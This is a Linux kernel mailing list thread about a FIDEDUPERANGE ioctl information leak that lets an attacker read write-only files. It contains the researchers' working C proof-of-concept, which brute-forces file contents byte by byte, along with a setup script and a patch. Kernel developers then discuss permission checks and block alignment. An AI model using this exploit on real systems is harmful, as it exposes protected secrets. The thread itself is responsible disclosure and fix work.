diff mbox series

Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files

Message ID a7c93559-4ba1-df2f-7a85-55a143696405@tu-darmstadt.de (mailing list archive)
State New, archived
Headers show
Series Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files | expand

Commit Message

Ansgar Lößer July 12, 2022, 12:11 p.m. UTC
Dear Mr. Viro,

using the deduplication API we found out, that the FIDEDUPERANGE ioctl 
syscall can be used to read a writeonly file.
A more formal description of the bug, an example code to exploit it and 
a proposed solution are attatched below.

In case of open questions please do not hesitate to contact us.

With best regards,
Ansgar Lößer


FIDEDUPERANGE ioctl allows reading writeonly files

The FIDEDUPERANGE ioctl can be used to read data from files that are 
supposed
to be writeonly on supported file systems (btrfs, xfs, ...).

confirmed on 5.18.3 (amd64, debian)
Reported-by: Ansgar Lößer (ansgar.loesser@kom.tu-darmstadt.de), Max Schlecht
(max.schlecht@informatik.hu-berlin.de) and Björn Scheuermann
(scheuermann@kom.tu-darmstadt.de)

The FIDEDUPERANGE ioctl is intended to be able to share physical storage for
multiple data blocks across files that contain identical data, on the 
same file
system. To do so, the ioctl takes a `src_fd` and `dest_fd`, as well as 
offset
and  length parameters, specifying data ranges should be tried to be
deduplicated. The ioctl then compares the contents of the data ranges and
returns the number of bytes that have been deduplicated.

The issue is, that while `src_fd` has to be open for reading, `dest_fd` only
has to be open for writing. Thus, multiple consecutive ioctl calls can 
be used
to read out the contents of `dest_fd`. This is done byte by byte, by trying
different input data, until getting a successful deduplication, indicating
equal content in the two data ranges. This technique works even if files are
marked as `append only` in btrfs.

The proposed fix is to change the required permissions, so that 
`dest_fd` has
to be open for reading as well.

exploit code (`read_writeonly.c`)
```C
#define _XOPEN_SOURCE 500 // pwrite
#include <linux/types.h>
#include <linux/fs.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <assert.h>

// use FIDEDUPERANGE ioctl to compare the target writeonly file (dest_fd)
// with the test file (src_fd)
int compare_fds(int src_fd, int dest_fd, __u64 offset, __u64 length)
{
     char buffer[sizeof(struct file_dedupe_range)
         + sizeof(struct file_dedupe_range_info)];
     struct file_dedupe_range* arg = (struct file_dedupe_range*)buffer;
     arg->src_offset = 0;
     arg->src_length = length;
     arg->dest_count = 1;
     arg->reserved1  = 0;
     arg->reserved2  = 0;

     struct file_dedupe_range_info* info = &arg->info[0];
     info->dest_fd = dest_fd;
     info->dest_offset = offset;
     info->reserved = 0;

     ioctl(src_fd, FIDEDUPERANGE, arg);
     printf("%d_%llu ", info->status, info->bytes_deduped);

     return info->status;
}

int main(int argc, char** argv)
{
     if (argc != 2)
     {
         fprintf(stderr, "./read_writeonly <filepath>\n");
         return 0;
     }

     // open the target writeonly file
     int target_fd = open(argv[1], O_WRONLY | O_APPEND);
     if (target_fd == -1)
     {
         fprintf(stderr, "failed to open \"%s\" with %d\n", argv[1], errno);
         return -1;
     }

     // create a test file to compare the target file with (via 
deduplication)
     int test_fd = open("test.tmp", O_RDWR | O_CREAT | O_TRUNC, 0777);
     if (test_fd == -1)
     {
         close(target_fd);
         fprintf(stderr, "fatal: failed to open test file with %d\n", 
errno);
         return -1;
     }

     __u64 file_offset = 0;
     do
     {
         int status;
         __u8 c;

         for (__u16 i = 0; i < 256; i++)
         {
             c = (__u8)i;
             __u64 offset = file_offset % 4096;
             __u64 length = offset + 1;
             __u64 block_offset = file_offset - offset;

             if (offset == 0)
             {
                 ftruncate(test_fd, 0);
             }

             pwrite(test_fd, &c, 1, offset);
             status = compare_fds(test_fd, target_fd, block_offset, length);

             if (status == FILE_DEDUPE_RANGE_SAME || status < 0)
             {
                 break;
             }
         }
         assert(status != FILE_DEDUPE_RANGE_DIFFERS);

         if (status < 0)
         {
             break;
         }

         putc(c, stdout);

         file_offset++;
     } while (1);

     close(target_fd);
     close(test_fd);
     unlink("test.tmp");

     return 0;
}
```

helper shell script (`test.sh`)
```sh
#!/bin/sh

gcc read_writeonly.c -o read_writeonly

# create writeonly file
touch writeonly.txt
chmod 220 writeonly.txt
echo "secret" > writeonly.txt
sudo chown 65535 writeonly.txt

# read from writeonly file
./read_writeonly writeonly.txt
```

proposed fix (read_writeonly.patch)
```
  }
```

Comments

Linus Torvalds July 12, 2022, 5:33 p.m. UTC | #1
[ Adding random people who get blamed for lines in this remap_range
thing to the participants ]

On Tue, Jul 12, 2022 at 5:11 AM Ansgar Lößer
<ansgar.loesser@tu-darmstadt.de> wrote:
>
> using the deduplication API we found out, that the FIDEDUPERANGE ioctl
> syscall can be used to read a writeonly file.

So I think your patch is slightly wrong, but I think this is worth
fixing - just likely differently.

First off - an odd technicality: you can already read write-only files
by simply mmap'ing them, because on many architectures PROT_WRITE ends
up implying PROT_READ too.

So you should basically expect that "I have permissions to write to
the file" automatically means that you can read it too.

People simply do that "open for writing, mmap to change it" and expect
it to work - not realizing that that means you have to be able to read
it too.

Anybody who thought otherwise was sadly wrong, and if you depend on
"this is write-only" as some kind of security measure for secrets, you
need to fix your setup.

Now, is that a "feature or a bug"? You be the judge.It is what it is,
and it's always been that way. Writability trumps readability, even if
you have to do special things to get there.

That said, this file remap case was clearly not intentional, and
despite the mmap() issue I think this is just plain wrong and we
should fix it as a QoI issue.

A dedupe may only write to the destination file, but at the same time
it does obviously have that implication of "I need to be able to read
it to see that it's duplicate".

However, your patch is wrong:

> --- a/fs/remap_range.c
> +++ b/fs/remap_range.c
> @@ -414,11 +414,11 @@ static bool allow_file_dedupe(struct file *file)
>
>       if (capable(CAP_SYS_ADMIN))
>           return true;
> -    if (file->f_mode & FMODE_WRITE)
> +    if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == (FMODE_READ |
> FMODE_WRITE))
>           return true;

This part looks like a good idea - although it is possible that people
will argue that this is the same kind of issue as 'mmap()' has (but
unlike mmap, we don't have "this is how the hardware works" issues, or
"long history of uses").

But

> -    if (!inode_permission(mnt_userns, inode, MAY_WRITE))
> +    if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE))

looks wrong.

Note that readability is about the file *descriptor*, not the inode.
Because the file descriptor may have been opened by somebody who had
permission to read the file even for a write-only file.

That happens for capability reasons, but it also happens for things
like "open(O_RDWR | O_CREAT, 0444)" which creates a new file that is
write-only in the filesystem, but despite that the file descriptor is
actually readable by the opener.

I wonder if the inode_permission() check should just be removed
entirely (ie the MAY_WRITE check smells bogus too, for the same reason
I don't like the added MAY_READ one)

 The file permission check - that was done at open time - is the
correct one, and is the one that read/write already uses.

Any permission checks done at IO time are basically always buggy:
things may have changed since the 'open()', and those changes
explicitly should *not* matter for the IO. That's really fundamentally
how UNIX file permissions work.

                Linus
Matthew Wilcox July 12, 2022, 6:43 p.m. UTC | #2
On Tue, Jul 12, 2022 at 10:33:01AM -0700, Linus Torvalds wrote:
> [ Adding random people who get blamed for lines in this remap_range
> thing to the participants ]
> 
> On Tue, Jul 12, 2022 at 5:11 AM Ansgar Lößer
> <ansgar.loesser@tu-darmstadt.de> wrote:
> >
> > using the deduplication API we found out, that the FIDEDUPERANGE ioctl
> > syscall can be used to read a writeonly file.
> 
> So I think your patch is slightly wrong, but I think this is worth
> fixing - just likely differently.

I'm going to leave discussing the permissions aspect to the experts in
that realm, but from a practical point of view, why do we allow the dedupe
ioctl to investigate arbitrary byte ranges?  If you're going to dedupe,
it has to be block aligned (both start and length).  If we enforce that
in the ioctl, this attack becomes impractical (maybe you can investigate
512-byte blobs of an 8192-bit key, but we seem to max out at 4096-bit
keys before switching to a fundamentally harder algorithm).
Linus Torvalds July 12, 2022, 6:47 p.m. UTC | #3
On Tue, Jul 12, 2022 at 11:43 AM Matthew Wilcox <willy@infradead.org> wrote:
>
> I'm going to leave discussing the permissions aspect to the experts in
> that realm, but from a practical point of view, why do we allow the dedupe
> ioctl to investigate arbitrary byte ranges?  If you're going to dedupe,
> it has to be block aligned (both start and length).

I agree, although I think that's a separate issue.

I suspect it should just check for inode->i_blkbits alignment. I think
that's what DIO does, and it seems like a sane minimum.

            Linus
Linus Torvalds July 12, 2022, 6:51 p.m. UTC | #4
On Tue, Jul 12, 2022 at 11:47 AM Linus Torvalds
<torvalds@linuxfoundation.org> wrote:
>
> I suspect it should just check for inode->i_blkbits alignment. I think
> that's what DIO does, and it seems like a sane minimum.

.. actually, looking closer, DIO also knows about and tries to deal
with blksize_bits() of the underlying device.

Which makes sense for IO patterns, because that's basically the
"physical alignment" (vs "logical alignment") part.

However, from a filesystem dedupe standpoint, I think the logical
alignment is what matters, so just i_blkbits seems to be the best
model.

            Linus
Josef Bacik July 12, 2022, 7:02 p.m. UTC | #5
On Tue, Jul 12, 2022 at 1:33 PM Linus Torvalds
<torvalds@linuxfoundation.org> wrote:
>
> [ Adding random people who get blamed for lines in this remap_range
> thing to the participants ]
>
> On Tue, Jul 12, 2022 at 5:11 AM Ansgar Lößer
> <ansgar.loesser@tu-darmstadt.de> wrote:
> >
> > using the deduplication API we found out, that the FIDEDUPERANGE ioctl
> > syscall can be used to read a writeonly file.
>
> So I think your patch is slightly wrong, but I think this is worth
> fixing - just likely differently.
>
> First off - an odd technicality: you can already read write-only files
> by simply mmap'ing them, because on many architectures PROT_WRITE ends
> up implying PROT_READ too.
>
> So you should basically expect that "I have permissions to write to
> the file" automatically means that you can read it too.
>
> People simply do that "open for writing, mmap to change it" and expect
> it to work - not realizing that that means you have to be able to read
> it too.
>
> Anybody who thought otherwise was sadly wrong, and if you depend on
> "this is write-only" as some kind of security measure for secrets, you
> need to fix your setup.
>
> Now, is that a "feature or a bug"? You be the judge.It is what it is,
> and it's always been that way. Writability trumps readability, even if
> you have to do special things to get there.
>
> That said, this file remap case was clearly not intentional, and
> despite the mmap() issue I think this is just plain wrong and we
> should fix it as a QoI issue.
>
> A dedupe may only write to the destination file, but at the same time
> it does obviously have that implication of "I need to be able to read
> it to see that it's duplicate".

Yeah the implication is there of course, we might as well honor it I
think?  Clearly it's sort of silly to say that the write doesn't imply
read, especially since we can get around it in other ways, but at the
same time I don't really see a harm in adding the extra "hey I can
read this too, right?" since DEDUPE does imply we need to be able to
read both sides.

>
> However, your patch is wrong:
>
> > --- a/fs/remap_range.c
> > +++ b/fs/remap_range.c
> > @@ -414,11 +414,11 @@ static bool allow_file_dedupe(struct file *file)
> >
> >       if (capable(CAP_SYS_ADMIN))
> >           return true;
> > -    if (file->f_mode & FMODE_WRITE)
> > +    if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == (FMODE_READ |
> > FMODE_WRITE))
> >           return true;
>
> This part looks like a good idea - although it is possible that people
> will argue that this is the same kind of issue as 'mmap()' has (but
> unlike mmap, we don't have "this is how the hardware works" issues, or
> "long history of uses").
>
> But
>
> > -    if (!inode_permission(mnt_userns, inode, MAY_WRITE))
> > +    if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE))
>
> looks wrong.
>
> Note that readability is about the file *descriptor*, not the inode.
> Because the file descriptor may have been opened by somebody who had
> permission to read the file even for a write-only file.
>
> That happens for capability reasons, but it also happens for things
> like "open(O_RDWR | O_CREAT, 0444)" which creates a new file that is
> write-only in the filesystem, but despite that the file descriptor is
> actually readable by the opener.
>
> I wonder if the inode_permission() check should just be removed
> entirely (ie the MAY_WRITE check smells bogus too, for the same reason
> I don't like the added MAY_READ one)
>
>  The file permission check - that was done at open time - is the
> correct one, and is the one that read/write already uses.
>
> Any permission checks done at IO time are basically always buggy:
> things may have changed since the 'open()', and those changes
> explicitly should *not* matter for the IO. That's really fundamentally
> how UNIX file permissions work.
>

I don't think we should go this far, after all the normal
write()/read() syscalls do the permission checking each time as well,
so this is consistent with any other file modification operation.  Of
course it's racey, but we should probably be consistently racey with
any other file modification operation.  Thanks,

Josef
Linus Torvalds July 12, 2022, 7:07 p.m. UTC | #6
On Tue, Jul 12, 2022 at 12:02 PM Josef Bacik <josef@toxicpanda.com> wrote:
>
> > Any permission checks done at IO time are basically always buggy:
> > things may have changed since the 'open()', and those changes
> > explicitly should *not* matter for the IO. That's really fundamentally
> > how UNIX file permissions work.
>
> I don't think we should go this far, after all the normal
> write()/read() syscalls do the permission checking each time as well,

No, they really don't.

The permission check is ONLY DONE AT OPEN TIME.

Really. Go look.

Anything else is a bug. If you open a file, and then change the
permissions of the file (or the ownership, or whatever) afterwards,
the open file descriptor is still supposed to be readable or writable.

Doing IO time permission checks is not only wrong, it's ACTIVELY
BUGGY, and is a fairly common source of security problems (ie passing
a file descriptor off to a suid binary, and then using the suid
permissions to make changes that the original opener didn't have the
rights to do).

So if you do permission checks at read/write time, you are a buggy
mess.  It really is that simple.

This is why read and write check FMODE_READ and FMODE_WRITE. That's
the *open* time check.

The fact that dedupe does that inode_permission() check at IO time
really looks completely bogus and buggy.

                 Linus
Linus Torvalds July 12, 2022, 7:23 p.m. UTC | #7
On Tue, Jul 12, 2022 at 12:07 PM Linus Torvalds
<torvalds@linuxfoundation.org> wrote:
>
> Anything else is a bug. If you open a file, and then change the
> permissions of the file (or the ownership, or whatever) afterwards,
> the open file descriptor is still supposed to be readable or writable.

.. it works the other way too. If you have higher capabilities and
open a file, and then drop the capabilities after the open, the file
descriptor is still supposed to be available.

Again, doing some new permission check at IO time is wrong.

Of course, the sad part is that we have done that wrong thing many
times. Several /proc files have had fairly lax open-time permission
checks, and then they do stricter checks at IO time, and it's been a
serious security issue many many times.

Similarly, the traditionally horribly broken BSD model of "do SCSI
ioctl's using read/write calls" was a complete disaster in this area,
exactly because the permission checks were then done based on the IO
details (ie whatever command was written). And then that was
fundamental to the whole interface, because some commands require more
permissions than others, so  you can't do the permission checks early.

This is largely why we then have that "file->f_cred" thing, so that
you can at least do things like "use the open-time credentials for
checking at IO time". Or just say "if open-time credentials are
different from IO time credentials, just abort".

That solves the SUID issue when the actor permissions ("credentials")
change, but it doesn't solve things like "somebody actually changed
the target file permissions themselves" issue. So those really have to
be tested at open time, and IO should not do "inode_permission()"
checks, because it's just fundamentally too late by then.

Of course, on eg stateless network filesystems, the IO-time permission
checks may be the only ones that the server side *can* do, and then
you end up with non-POSIX behavior and potential breakage.

The world is a messy place.

              Linus
Josef Bacik July 12, 2022, 8:03 p.m. UTC | #8
On Tue, Jul 12, 2022 at 12:07:46PM -0700, Linus Torvalds wrote:
> On Tue, Jul 12, 2022 at 12:02 PM Josef Bacik <josef@toxicpanda.com> wrote:
> >
> > > Any permission checks done at IO time are basically always buggy:
> > > things may have changed since the 'open()', and those changes
> > > explicitly should *not* matter for the IO. That's really fundamentally
> > > how UNIX file permissions work.
> >
> > I don't think we should go this far, after all the normal
> > write()/read() syscalls do the permission checking each time as well,
> 
> No, they really don't.
> 
> The permission check is ONLY DONE AT OPEN TIME.
> 
> Really. Go look.
>

I did, I just misread what rw_verify_area was doing, it's just doing the
security check, not a full POSIX permissions check, my mistake.

> Anything else is a bug. If you open a file, and then change the
> permissions of the file (or the ownership, or whatever) afterwards,
> the open file descriptor is still supposed to be readable or writable.
> 
> Doing IO time permission checks is not only wrong, it's ACTIVELY
> BUGGY, and is a fairly common source of security problems (ie passing
> a file descriptor off to a suid binary, and then using the suid
> permissions to make changes that the original opener didn't have the
> rights to do).
> 
> So if you do permission checks at read/write time, you are a buggy
> mess.  It really is that simple.
> 
> This is why read and write check FMODE_READ and FMODE_WRITE. That's
> the *open* time check.
> 
> The fact that dedupe does that inode_permission() check at IO time
> really looks completely bogus and buggy.
> 

Yeah I'm fine with removing the inode_permission(), I just want to make sure
we're consistent across all of our IO related operations.  It looks like at the
very least we're getting security_*_permission on things like
read/write/fallocate, so perhaps switch to that here and call it good enough?
Thanks,

Josef
Linus Torvalds July 12, 2022, 8:48 p.m. UTC | #9
On Tue, Jul 12, 2022 at 1:04 PM Josef Bacik <josef@toxicpanda.com> wrote:
>
> Yeah I'm fine with removing the inode_permission(), I just want to make sure
> we're consistent across all of our IO related operations.  It looks like at the
> very least we're getting security_*_permission on things like
> read/write/fallocate, so perhaps switch to that here and call it good enough?

remap_verify_area() already does that, afaik.

The more I look at the remap_range stuff, the more I feel it is very
ad-hoc and nobody really thought deeply about it.

What about an append-only destination? Is that kind of write supposed
to be ok because it's just REMAP_FILE_DEDUP? The open side should
already have checked for IS_IMMUTABLE, but O_APPEND is a thing?

I'm getting the feeling that somebody really needs to think about what
the semantics should be.

In the meantime, I think that requiring the block size alignment is
the important part here. The "check read permissions" is kind of a
non-issue, since we already have that mmap() case.

Strangely, it *does* check that the position is aligned for remapping
in .generic_remap_checks(). And not at all for dedupe.

And even for remapping, the size alignment is a bit strange. It takes
the "source EOF" into account, but what if the destination file is big
enough that that's not the end?

And the inode_permission() check is wrong, but at least it does have
the important check there (ie that FMODE_WRITE one). So doing the
inode_permissions() check at worst just makes it fail too often, but
since it's all a "optimistically dedupe" anyway, that kind of "fail in
odd situations" doesn't really matter.

So for allow_file_dedupe(), I'd suggest:

 (a) remove the inode_permission() check in allow_file_dedupe()

 (b) remove the uid_eq() check for the same reason (if you didn't open
the destination for write, you have no business deduping anything,
even if you're the owner)

 (c) add a "can't do it for APPEND_ONLY" (but let the CAP_SYS_ADMIN override it)

AND I'd add a "make sure it's all block-aligned" check for both the
source and each destination chunk.

Something like the attached, IOW. Entirely untested, this is not meant
to be applied as-is, this is meant to be the basis of discussion.

Btw, the generic_remap_file_range_prep() IS_IMMUTABLE check seems
bogus too. How could it possibly be immutable if we've opened the
target for writing?

So all of this seems a bit confused. It really smells like "filesystem
people wrote this with low-level filesystem rules in mind, rather than
any kind of high-level understanding or conceptual rules"

Hmm?

                 Linus
Darrick J. Wong July 13, 2022, 12:48 a.m. UTC | #10
On Tue, Jul 12, 2022 at 01:48:18PM -0700, Linus Torvalds wrote:
> On Tue, Jul 12, 2022 at 1:04 PM Josef Bacik <josef@toxicpanda.com> wrote:
> >
> > Yeah I'm fine with removing the inode_permission(), I just want to make sure
> > we're consistent across all of our IO related operations.  It looks like at the
> > very least we're getting security_*_permission on things like
> > read/write/fallocate, so perhaps switch to that here and call it good enough?
> 
> remap_verify_area() already does that, afaik.
> 
> The more I look at the remap_range stuff, the more I feel it is very
> ad-hoc and nobody really thought deeply about it.
> 
> What about an append-only destination? Is that kind of write supposed
> to be ok because it's just REMAP_FILE_DEDUP? The open side should
> already have checked for IS_IMMUTABLE, but O_APPEND is a thing?

This whole area of dedupe preconditions is a giant mess that makes my
head hurt every time I think about it, so I don't really think about it.
I hoisted all of it from btrfs to reuse the system call entry point
without breaking existing userspace.

Were I designing this from scratch for XFS, I would've required either
CAP_SYS_ADMIN; or FMODE_READ on the src, and FMODE_READ|WRITE on the
dest, and left it at that.  Neither file can be IMMUTABLE because,
frankly, I don't see much point in having such a flag if its behavior is
the same as chmod 0000; I'll come back to this.  Deduping between
readable O_APPEND files would be fine because we're not writing to
either file.

(But that's my own fantasyland.)

AFAICT, the reason why dedupe does all the weird checks it does is
because apparently some of the dedupe tools expect that they can do
weird things like dedupe into a file that they own but haven't opened
for writes or could open for writes.  Change those bits, and you break
userspace.

Given that you can already mmap the write-only file and read data from
the mapping, I don't see what the leak is.  If someone really wants to
break userspace on these grounds, they can own all the howling that
results.

> I'm getting the feeling that somebody really needs to think about what
> the semantics should be.
> 
> In the meantime, I think that requiring the block size alignment is
> the important part here. The "check read permissions" is kind of a
> non-issue, since we already have that mmap() case.
> 
> Strangely, it *does* check that the position is aligned for remapping
> in .generic_remap_checks(). And not at all for dedupe.

The dedupe implementations /do/ check file blocksize, it's under
generic_remap_file_range_prep.  The reason this exploit program works on
the 7-byte file is that we stop comparing at EOF, which means that there
are fewer bytes to guess.  But.  You can already read the file anyway.

> And even for remapping, the size alignment is a bit strange. It takes
> the "source EOF" into account, but what if the destination file is big
> enough that that's not the end?

generic_remap_check_len is supposed to catch those.

> And the inode_permission() check is wrong, but at least it does have
> the important check there (ie that FMODE_WRITE one). So doing the
> inode_permissions() check at worst just makes it fail too often, but
> since it's all a "optimistically dedupe" anyway, that kind of "fail in
> odd situations" doesn't really matter.
> 
> So for allow_file_dedupe(), I'd suggest:
> 
>  (a) remove the inode_permission() check in allow_file_dedupe()
> 
>  (b) remove the uid_eq() check for the same reason (if you didn't open
> the destination for write, you have no business deduping anything,
> even if you're the owner)

So we're going to break userspace?
https://github.com/markfasheh/duperemove/issues/129

>  (c) add a "can't do it for APPEND_ONLY" (but let the CAP_SYS_ADMIN override it)
> 
> AND I'd add a "make sure it's all block-aligned" check for both the
> source and each destination chunk.

...and we're going to break deduping the EOF block again?

> Something like the attached, IOW. Entirely untested, this is not meant
> to be applied as-is, this is meant to be the basis of discussion.
> 
> Btw, the generic_remap_file_range_prep() IS_IMMUTABLE check seems
> bogus too. How could it possibly be immutable if we've opened the
> target for writing?

What /is/ the meaning of S_IMMUTABLE?  Documentation/ only says that the
fsverity author thinks it means "read-only contents".  If it's the same
as "chmod 0000" in that anyone with a writable fd can still modify the
supposedly immutable file, then what was the point?

The manual page for the getflags/setflags ioctls (~2017) say this:

"FS_IMMUTABLE_FL 'i'
              The file is immutable: no changes are permitted to the
              file contents or metadata (permissions, timestamps,
              ownership, link count, and so on).  (This restriction
              applies even to the superuser.)  Only a privileged process
              (CAP_LINUX_IMMUTABLE) can set or clear this attribute."

https://man7.org/linux/man-pages/man2/ioctl_iflags.2.html

Going back to e2fsprogs 1.02 in 1997, the manual page for chattr says
this:

"      i      A file with the 'i' attribute cannot be modified: it
              cannot be deleted or renamed, no link can be created to
              this file, most of the file's metadata can not be
              modified, and the file can not be opened in write mode.
              Only the superuser or a process possessing the
              CAP_LINUX_IMMUTABLE capability can set or clear this
              attribute."

https://man7.org/linux/man-pages/man1/chattr.1.html

To me, that sounds like you shouldn't be able to change the contents of
an immutable file, full stop, and that's what the authors of the
clone/dedupe/copy_file_range calls have all gone with.

True, you can write() to such a file if you have a writable fd, but
that's not what I would have expected from the documentation.  ISTR Ted
or someone muttering that the current behavior seems much more like a
historical accident than planned out semantics.

> So all of this seems a bit confused. It really smells like "filesystem
> people wrote this with low-level filesystem rules in mind, rather than
> any kind of high-level understanding or conceptual rules"

Frankly, I don't know what all the high level conceptual rules are for
Linux filesystems.  They don't seem to be written down in Documentation/
and this has made writing fstests very difficult for me when I want to
wire up XFS to some syscall or another, and what documentation there is
doesn't seem to be consistent with what the kernel actually does.

--D

> Hmm?
> 
>                  Linus

>  fs/remap_range.c | 27 +++++++++++++++++++--------
>  1 file changed, 19 insertions(+), 8 deletions(-)
> 
> diff --git a/fs/remap_range.c b/fs/remap_range.c
> index e112b5424cdb..ba71ceb8dde3 100644
> --- a/fs/remap_range.c
> +++ b/fs/remap_range.c
> @@ -409,17 +409,12 @@ EXPORT_SYMBOL(vfs_clone_file_range);
>  /* Check whether we are allowed to dedupe the destination file */
>  static bool allow_file_dedupe(struct file *file)
>  {
> -	struct user_namespace *mnt_userns = file_mnt_user_ns(file);
> -	struct inode *inode = file_inode(file);
> -
>  	if (capable(CAP_SYS_ADMIN))
>  		return true;
> +	if (file->f_flags & O_APPEND)
> +		return false;
>  	if (file->f_mode & FMODE_WRITE)
>  		return true;
> -	if (uid_eq(current_fsuid(), i_uid_into_mnt(mnt_userns, inode)))
> -		return true;
> -	if (!inode_permission(mnt_userns, inode, MAY_WRITE))
> -		return true;
>  	return false;
>  }
>  
> @@ -428,6 +423,8 @@ loff_t vfs_dedupe_file_range_one(struct file *src_file, loff_t src_pos,
>  				 loff_t len, unsigned int remap_flags)
>  {
>  	loff_t ret;
> +	struct inode *dst;
> +	unsigned long blocksize;
>  
>  	WARN_ON_ONCE(remap_flags & ~(REMAP_FILE_DEDUP |
>  				     REMAP_FILE_CAN_SHORTEN));
> @@ -457,10 +454,17 @@ loff_t vfs_dedupe_file_range_one(struct file *src_file, loff_t src_pos,
>  		goto out_drop_write;
>  
>  	ret = -EISDIR;
> -	if (S_ISDIR(file_inode(dst_file)->i_mode))
> +	dst = file_inode(dst_file);
> +	if (S_ISDIR(dst->i_mode))
>  		goto out_drop_write;
>  
>  	ret = -EINVAL;
> +	blocksize = 1ul << dst->i_blkbits;
> +	if (dst_pos & (blocksize-1))
> +		goto out_drop_write;
> +	if (len & (blocksize-1))
> +		goto out_drop_write;
> +
>  	if (!dst_file->f_op->remap_file_range)
>  		goto out_drop_write;
>  
> @@ -488,6 +492,7 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same)
>  	int ret;
>  	u16 count = same->dest_count;
>  	loff_t deduped;
> +	unsigned long blocksize;
>  
>  	if (!(file->f_mode & FMODE_READ))
>  		return -EINVAL;
> @@ -507,6 +512,12 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same)
>  	if (!file->f_op->remap_file_range)
>  		return -EOPNOTSUPP;
>  
> +	blocksize = 1ul << src->i_blkbits;
> +	if (off & (blocksize-1))
> +		return -EINVAL;
> +	if (len & (blocksize-1))
> +		return -EINVAL;
> +
>  	ret = remap_verify_area(file, off, len, false);
>  	if (ret < 0)
>  		return ret;
Linus Torvalds July 13, 2022, 2:58 a.m. UTC | #11
On Tue, Jul 12, 2022 at 5:48 PM Darrick J. Wong <djwong@kernel.org> wrote:
>
> AFAICT, the reason why dedupe does all the weird checks it does is
> because apparently some of the dedupe tools expect that they can do
> weird things like dedupe into a file that they own but haven't opened
> for writes or could open for writes.  Change those bits, and you break
> userspace.

Christ, what a crock.

> The dedupe implementations /do/ check file blocksize, it's under
> generic_remap_file_range_prep.  The reason this exploit program works on
> the 7-byte file is that we stop comparing at EOF, which means that there
> are fewer bytes to guess.  But.  You can already read the file anyway.

The dedupe clearly does *not* check for blocksize. It doesn't even
call generic_remap_file_range_prep().

Just check it yourself:

    do_vfs_ioctl ->
        case FIDEDUPERANGE:
         ioctl_file_dedupe_range(filp, argp) ->
            vfs_dedupe_file_range(file, same) ->

and there it is. All that calls is remap_verify_area() for both files,
and allow_file_dedupe() for the target.

Now, maybe some filesystem then calls the checking functions, but
considering the posted code, that can't be true, because no, the  the
whole EOF argument is garbage, because even if the *source* was at
EOF, the destination offset should still have been checked for being
at a block boundary.

And it clearly wasn't, since the code just walks the destination
offset one byte at a time.

So you may *think* that it checks the file blocksize, but I'm afraid
reality disagrees.  And no amount of "source is at EOF" is possibly
relevant for the destination block size check.

> So we're going to break userspace?
> https://github.com/markfasheh/duperemove/issues/129

Well, if you're supposed to be able to dedupe read-only files, then
the whole "check for writing" is just bogus to begin with.

So in no way are any of those checks possibly correct.

The destination offset is clearly not checked at all.

And if writability isn't something you want honored, then FMODE_WRITE
shouldn't have been an issue.

> ...and we're going to break deduping the EOF block again?

Why are you arguing about something that is clearly broken.

The lack of destination offset checking cannot possibly be rigth. No
amount of "EOF block" is relevant AT ALL.

Stop it. You're making an argument that has nothing to do with the bug at hand.

> What /is/ the meaning of S_IMMUTABLE?  Documentation/ only says that the
> fsverity author thinks it means "read-only contents".  If it's the same
> as "chmod 0000" in that anyone with a writable fd can still modify the
> supposedly immutable file, then what was the point?

No, the whole point is that you cannot ever get a writable file
descriptor to an immutable file.

So if that FMODE_WRITE check is correct, then IS_IMMUTABLE is nonsense.

And if MODE_WRITE isn't correct, and dedupe is considered a read-only
operation, then *that* isn't valid.

You can't have it both ways. Which is it?

That's really my point here - all those checks are completely random
noise. There is absoltuely no rhyme or reason to them.

And the offset check is clearly not there, and you should stop talking
about "source EOF", because that is irrelevant. Source EOF may affect
the *length* of the block, but it does not affect the offset of the
destination.

               Linus
Linus Torvalds July 13, 2022, 4:14 a.m. UTC | #12
On Tue, Jul 12, 2022 at 7:58 PM Linus Torvalds
<torvalds@linuxfoundation.org> wrote:
>
> Well, if you're supposed to be able to dedupe read-only files, then
> the whole "check for writing" is just bogus to begin with.

Hmm. Maybe that's too strong. The "if you can write to it, you can
always dedup it" does make sense, and then couple that with "other
situations are also ok".

And if you were to want to dedup things like symlinks (do people?) you
need to be able to handle FMODE_PATH cases that aren't FMODE_WRITE.

And at that point, the "inode owner" check starts making sense.

Except the code doesn't allow symlinks anyway right now, so that's
kind of theoretical.

But then you really do need to check for IS_IMMUTABLE there too and
that it's a valid file type, and not just hope that it's checked for
elsewhere. And those checks shouldn't pass just because of
CAP_SYS_ADMIN, so that check seems to be in the wrong place too.

So maybe it mostly works (apart from how clearly the destination
offset alignment check is somehow missing or done too late or
whatever), but it all seems very random, with checks spread out and
not with any consistency or logic.

As an example of this randomness, for the dedup source file, we have
three different error returns for checking whether it's ok in
vfs_dedupe_file_range(*):

        if (S_ISDIR(src->i_mode))
                return -EISDIR;

        if (!S_ISREG(src->i_mode))
                return -EINVAL;

        if (!file->f_op->remap_file_range)
                return -EOPNOTSUPP;

but then for the destination check the code does

        ret = -EISDIR;
        if (S_ISDIR(file_inode(dst_file)->i_mode))
                goto out_drop_write;

        ret = -EINVAL;
        if (!dst_file->f_op->remap_file_range)
                goto out_drop_write;

and again - maybe this works, and it's just that the error return is
inconsistent for source-vs-target, but it just reinforces that whole
"this is all completely ad-hoc and doesn't really make much sense".

            Linus
Dave Chinner July 13, 2022, 6:46 a.m. UTC | #13
On Tue, Jul 12, 2022 at 07:58:11PM -0700, Linus Torvalds wrote:
> On Tue, Jul 12, 2022 at 5:48 PM Darrick J. Wong <djwong@kernel.org> wrote:
> >
> > AFAICT, the reason why dedupe does all the weird checks it does is
> > because apparently some of the dedupe tools expect that they can do
> > weird things like dedupe into a file that they own but haven't opened
> > for writes or could open for writes.  Change those bits, and you break
> > userspace.
> 
> Christ, what a crock.

Yes, the dedupe API is ... poor. But we're stuck with it because
someone called Linus Torvalds who keeps telling us that we
should not break userspace if there's *any way possible* to avoid
doing so....

.... and in this case, I think the problem is avoided by a simple
fix to generic_remap_checks().

> > The dedupe implementations /do/ check file blocksize, it's under
> > generic_remap_file_range_prep.  The reason this exploit program works on
